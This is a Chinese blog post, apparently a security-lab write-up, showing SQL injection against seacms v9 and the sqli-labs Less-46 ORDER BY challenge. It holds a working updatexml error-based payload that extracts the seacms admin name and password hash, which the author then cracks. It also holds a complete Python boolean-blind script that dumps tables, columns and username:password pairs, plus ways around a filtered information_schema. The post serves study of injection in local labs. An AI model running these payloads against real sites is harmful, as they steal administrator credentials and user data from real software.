seacmsv9注入管理员账号密码+orderby+limit

最新推荐文章于 2025-05-15 17:05:35 发布
最新推荐文章于 2025-05-15 17:05:35 发布
阅读量989 收藏 15
点赞数 28
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_75255229/article/details/145825307
版权

一、seacmsv9 SQL注入漏洞

1.1 seacms漏洞介绍

海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,采
用的是 php5.X+mysql 的架构,seacmsv9漏洞文件:./comment/api/index.php,漏洞参数:$rlist

1.2 漏洞绕过
由于seacms开源,可以知道seacmsv9系统数据库(mysql)为seacms,存放管理员账号的表为
sea_admin,表中存放管理员姓名的字段为name,存放管理员密码的字段为password

经过源码分析,使用以下语句注入(limit避免管理员有多个,导致SQL语句报错):
name:
http://localhost/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`, updatexml
(1,concat_ws(0x20,0x5c,(select name from%23%0asea_admin limit 0,1)),1), @`'`
第一次尝试:

并没有成功,使用Wireshark抓包发现最终执行的SQL为:
SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment 
WHERE m_type=1 AND id in (@`\'`, updatexml(1,concat_ws(0x20,0x5c,(select name from#
sea_admin limit 0,1)),1), @`\'`) ORDER BY id DESC

在mysql数据库中执行这个SQL语句,并没有报错报出管理员姓名

而下面修改为查询database()却能报出数据库名

经过查阅资料,发现是前面sea_comment表没数据(上图),导致并没有执行报错中的
查询语句,而database()能执行,应该是优先执行的问题,而sea_comment表中应该是
有数据的,于是就插入了一条数据,但发现还是没有执行,于是又插入了一条数据,发
现可以执行了
最后,再次在地址栏尝试注入语句,成功注入出账号为admin

password:
http://localhost/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`, updatexml
(1,concat_ws(0x20,0x5c,(select password from%23%0asea_admin limit 0,1)),1), @`'`
密码同理

注入密码为23a7bbd73250516f069d,可以看出是经过md5加密的,于是到https://cmd5.com/
解密,得到密码为admin123

自此,    得到管理员账号为admin,密码为admin123

二、order by 布尔盲注
2.1 环境介绍
sqlilabs靶场第46关,参数sort传入id,如下
 


参数sort传入username,如下

看源码可知,sort前面是order by,通过sort传入的字段排序

2.2 布尔盲注
于是用sort=if(表达式,id,username)的方式注入,通过BeautifulSoup爬取表格中username下一格的
值是否等于Dumb来判断表达式的真假,并使用二分查找加快注入速度,从而实现boolen(布尔)
注入,具体代码如下

import requests
from bs4 import BeautifulSoup

def get_username(resp):
    soup = BeautifulSoup(resp,'html.parser')
    username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
    return username

def inject_database_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr(database(),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)

def inject_table_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(table_name) from \
                information_schema.tables where table_schema=database()),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)

def inject_column_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(column_name) from \
                information_schema.columns where table_schema=database() and table_name='users'),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)

def inject_data_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(username,':',password) \
                from users),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)

if __name__ == '__main__':
    # inject_database_boolen()
    # inject_table_boolen()
    # inject_column_boolen()
    inject_data_boolen()



注入结果如下:

三、过滤information_schema解决方案(mysql)
3.1 获取表名
使用sys库下的schema_auto_increment_columns表代替,具体如下
select table_name from sys.schema_auto_increment_columns where table_schema=database();


3.2 获取字段名
使用join关键字的子查询,使用using (字段名1,字段名2,..)逐个过滤已查询字段,具体如下
select * from (select * from users as a join users as b)c;
select * from (select * from users as a join users as b using (id))c;
select * from (select * from users as a join users as b using (id,username))c;

M.L.Z.T
关注
Seacms最新版本注入实战+后台RCE成功getshell-2018年老文章
J0o1ey Blog
06-21 6692
有技术培训需求/技术交流/代码审计需求/的朋友可以联系QQ547006660 0X001海洋CMS简介# 海洋cms是为解决站长核心需求而设计的视频内容管理系统,一套程序自适应电脑、手机、平板、APP多个终端入口,无任何加密代码、安全有保障,是您最佳的建站工具。——来自seacms官网(简而言之就是专门搭建看片网站的cms) 呵呵,安全有保障??头都给你打爆掉,百度搜索seacms。。漏洞信息...
seacms海洋cms影视管理系统 v9.1.zip
07-07
seacms海洋cms影视管理系统 v9.1 更新日志 更新日期:2019年2月1日 v9.1 优化:服务器开启OPcache时后台设置兼容性 优化:视频编辑时剧情分类显示方式 优化:剧情分类缓存项 seacms海洋影视管理系统简介 海洋影视管理系统(seacms海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。 海洋cms采用PHP MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。海洋cms支持一键转换原max的模板和数据,实现网站无缝迁移到新平台。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其它的交给我们。 为符合SEO要求开发大量功能,比如百度结构化数据生成,搜索引擎地图等。全新设计的专题管理,同时支持按分类 扩展分类 剧情分类三种分类模式组合,让网站内容与众不同。简单易用丰富的模板标签,方便网站模板设计制作,让网站更显专业。 海洋cms是基于PHP MySql技术开发的开源CMS,完全开源 、没有任何加密代码,强劲功能、卓越性能、安全健壮。超级易用、模板众多、插件齐全、资源丰富。构架稳健,平滑升级。 seacms海洋影视管理系统前台页面 seacms海洋影视管理系统后台管理 后台路径:域名//admin 用户名与密码:admin(安装时可设置) 后台页面:  相关阅读 同类推荐:站长常用源码
海洋CMS最新版V9.96新模板修复详情页和播放页PC版手机访问二维码自动生成问题
XYCMS博客家园
08-13 1090
海洋CMS最新版V9.96新模板是海洋官方才发布的,由于是新发布,BUG很多,官方的详情页和播放页提示手机访问页面的那个是固定二维码图片,是后台设置的,现在我提供修复方法,让详细页和播放页自动生成手机访问二维码地址页面; 默认官方模板显示二维码地方是 <img class="icon" src="{seacms:ewm}" width="196"/> 您可以替换为: &l...
seacmsv9注入管理员账号密码+order by+limit
lq_ioi_pl的博客
02-25 811
这样的话,由于order by默认是升序排列的,没有desc也没有影响,同时,加上了^0也还是id本身,所以跟原来正常的排序没有任何的变化。另外就是没有order by注入没有回显的情况,这时就该用到盲注了,也就是说采取根据页面回显的状态进行判断的形式来进行布尔盲注。但如果是加上了^1的话,就会跟原来的排序发生明显变化,盲注也就通过这里的变化来判断我们注入的sql语句是否返回1。首先这里运用到了一个异或的知识,0异或任何数值都还是这个值的本身,比如说0^10010的值还是10010。
SQL注入:对cms管理系统进行SQL注入,分别使用手工注入和自动化注入两种方法,获取管理员账号密码
2401_83124412的博客
06-29 692
进行字符转码:cms_article,cms_category,cms_file,cms_friendlink,cms_message,cms_notice,cms_page,cms_users。id=33 and 1=1 /and 1=2判断。3.爆破字段,猜测数据在cms_users表里面,查看字段,有id,username,password三个字段。回显报错信息,因为联合查询,每列的数据类型不同而报错,将 table_name。传参id=33’,报错’’’,可初步判定存在数字型注入点,进一步验证。
04 渗透测试基础
热门推荐
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
安全巡检清单
yh
05-15 760
软件状态巡检应深入到系统内核层面。漏洞扫描是软件状态巡检的重要组成部分,需要定期对网络设备、主机、数据库、应用系统等进行全面的漏洞扫描,利用专业的扫描工具发现已知和未知的安全漏洞。通过严格执行本清单所列的各项检查内容,并结合企业自身的业务特点和安全需求进行适当调整和补充,可以有效地提升信息系统的整体安全水平,降低安全风险,为企业的稳健发展提供坚实保障。通过周期性的状态检查、安全扫描、日志分析和补丁管理,可以及时发现并修复潜在的安全隐患和漏洞,确保网络设备、服务器、操作系统及应用系统的高可用性和安全性。
PHP API安全设计四要素:构建坚不可摧的接口防护体系
每日一贴
05-11 782
分层防御:不要依赖单一安全措施,采用多层次防护最小权限原则:只授予必要的API访问权限定期轮换密钥:定期更换API密钥和加密密钥详细日志记录:记录所有API请求用于审计和分析API版本控制:通过版本号管理接口变更输入验证:严格验证所有输入参数错误处理:避免暴露敏感信息的错误消息通过实施这些安全措施,您的PHP API将能够抵御大多数常见攻击,确保数据传输的安全性和完整性。
AI智能分析网关V4周界入侵检测算法精准监测与智能分析,筑牢周界安全防线
NVR安防视频技术
05-14 516
随着安全防范需求的不断提升,传统周界安防系统存在误报率高、响应迟缓、智能化程度低等问题,难以满足现代化安全管理的要求。
除了GC哪些地方有用到安全
有时间就写写代码
05-15 495
安全点在多个编程场景中至关重要,尤其是在并发编程和多线程环境中。首先,在多线程同步中,安全点通过锁机制(如ReentrantLock)确保线程在访问共享资源时不会被中断,避免竞争条件。其次,在内存屏障中,安全点(如volatile关键字)防止指令重排序,确保多核处理器中的数据一致性。此外,在数据库事务中,保存点作为安全点允许部分回滚,提升性能。最后,在实时操作系统中,安全点通过资源锁定确保任务切换时的系统稳定性。总之,安全点在多线程、内存管理、数据库和实时系统等场景中,通过确保一致性和安全性,有效避免了竞态
什么是TCP协议?它存在哪些安全挑战?
yundun_no1的博客
05-15 299
TCP(传输控制协议)是互联网中面向连接、可靠的传输层协议,主要负责在不可靠的IP层上实现数据的可靠传输。面向连接:通信前需通过三次握手(SYN-SYN/ACK-ACK)建立连接,确保双方就绪。可靠性:通过序列号、确认应答(ACK)、超时重传和校验和机制,保障数据无丢失、无重复、按序到达。流量控制与拥塞控制:使用滑动窗口动态调整发送速率,避免网络过载。全双工通信:支持双向数据传输,双方可同时发送和接收数据。TCP协议是互联网的基石,但其安全性依赖于上层协议和管理措施。
【SSL证书系列】操作系统如何保障根证书的有效性和安全
DZ Space
05-14 969
操作系统通过多层安全机制保障根证书的有效性和安全性,防止篡改、伪造或滥用。核心措施包括:根证书存储在受保护的隔离区域,结合硬件级保护;操作系统预装通过严格审核的权威CA证书,定期审查和淘汰不安全证书;采用自动签名更新和防回滚机制,确保证书链验证的完整性;引入安全启动、内存保护、沙箱等防御性技术;通过权限控制和警告机制限制用户操作;建立应急响应机制,支持手动吊销和实时检查证书状态;防御中间人攻击和CA私钥泄露等场景;提供用户教育工具和透明度公告。这些措施构建了多层防御体系,最大限度降低风险。
人脸识别备案:筑牢人脸信息 “安全墙”
2501_91088474的博客
05-13 591
人脸识别备案制度主要依据《人脸识别技术应用安全管理办法》建立,人脸识别技术广泛应用于安防、金融、门禁、交通等领域,带来便利高效的同时,人脸信息安全问题也引发担忧。为规范技术应用、保护个人信息权益,人脸识别备案制度应运而生。
HGDB企业版迁移到HGDB安全
HighGO
05-15 619
F format或者–format=format:设定文件输出的格式,format的值有p(plain)、c(custom)等,p是备份成纯文本的SQL脚 本,c是自定义格式,选择c时,文件扩展名一般是.backup。-n schema或者–schema=schema:指定备份的模式,多个模式时写-n schema1 -n schema2…-a, --data-only: 只转储数据,不包括模式。-s或者–schema-only:只备份DDL,与–data-only相反。
获取高德地图JS API的安全密钥和Key的方法
qq_60245590的博客
05-12 588
要使用高德地图JavaScript API,您需要获取API Key和安全密钥(securityJsCode)。
如何安全配置好CDN用于防止DDoS与Web攻击 ?
2409_89014517的博客
05-15 610
如何安全配置好CDN用于防止DDoS与Web攻击 ?
生成式AI在编程中的应用场景:从代码生成到安全检测
最新发布
喵叔
05-15 131
生成式AI在编程中的应用正在快速发展,从简单的代码生成到复杂的系统设计,AI技术正在改变软件开发的每个环节。虽然仍面临一些挑战,但随着技术的不断进步,生成式AI将成为软件开发不可或缺的助手。我们需要在充分利用AI优势的同时,也要注意防范潜在风险,确保技术发展始终服务于提升开发质量和效率的目标。
mysql orderby+limit语法
04-19
MySQL中的ORDER BY和LIMIT语法用于对查询结果进行排序和限制返回的记录数量。 ORDER BY语法: ORDER BY子句用于指定查询结果的排序方式。它可以按照一个或多个列进行排序,并且可以指定升序(ASC)或降序(DESC)。 示例: SELECT * FROM table_name ORDER BY column_name ASC; SELECT * FROM table_name ORDER BY column_name1 ASC, column_name2 DESC; LIMIT语法: LIMIT子句用于限制查询结果返回的记录数量。它可以指定从查询结果的起始位置开始返回指定数量的记录。 示例: SELECT * FROM table_name LIMIT 10; -- 返回前10条记录 SELECT * FROM table_name LIMIT 5, 10; -- 返回从第6条记录开始的10条记录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值